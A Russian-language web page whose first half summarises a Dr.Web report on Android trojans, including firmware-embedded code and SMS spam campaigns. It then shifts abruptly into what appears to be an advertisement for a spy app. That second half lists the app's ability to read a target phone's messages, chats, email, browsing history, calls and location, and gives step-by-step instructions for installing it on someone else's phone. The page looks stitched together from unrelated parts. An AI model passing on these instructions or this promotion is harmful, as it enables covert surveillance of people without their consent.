Dr.Web: безопасность Android всё ещё на низком уровне

cad1bc15127b8931f22c2f62af1c9808Специалисты из Dr.Web опубликовали очередной отчёт, затрагивающий вопросы вирусной активности на Android. Было изучено большое количество новых вирусов и троянов, которые появились в период с декабря по январь. Это и вредоносные эксплоиты, и троянские программы для кражи личных данных пользователей, и вирусы банковских терминалов.

Особое внимание уделялось вредоносному коду, который внедрялся непосредственно в прошивку ОС Android. Есть основания полагать, что подобным промышляют и многие производители мобильных устройств, базирующиеся на территории Китая.

Использование внедрения кода сейчас практикуется хакерами реже, чем это было год тому назад. Но угроза всё ещё сохраняется. Самым популярным решением является формирование запросов через C&C сервер, с которого в телефон жертвы пересылается короткое текстовое SMS сообщение. Оно позволяет запускать произвольный код, воровать личные данные, и даже открывать разные приложения. В результате могут быть украдены пароли от социальных сетей, банковские реквизиты и многое другое.

Вредоносный код способен скрытно устанавливать в мобильник сторонние приложения, удалять уже имеющиеся, проверять историю браузера смартфона. Обнаружить злоумышленников практически невозможно, особенно если внедрение происходило уже в момент установки операционной системы. Даже современные антивирусы редко способны распознать подобное. Что касается деятельности Dr.Web, она направлена на увеличение сознательности пользователей. Не следует устанавливать сомнительный софт в свой мобильник, переходить по непонятным ссылкам и т.д.

Простейшим способом распространения троянов остаётся рассылка SMS. Сейчас она часто практикуется в Южной Корее. Злоумышленники рассылают пользователям такие сообщения, поскольку защищённость местных операторов сотовой связи оставляет желать лучшего, а многие абонентские базы свободно плавают по Сети. Только за декабрь сотрудниками Dr.Web было зафиксировано более 150 подобных спам-кампаний.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.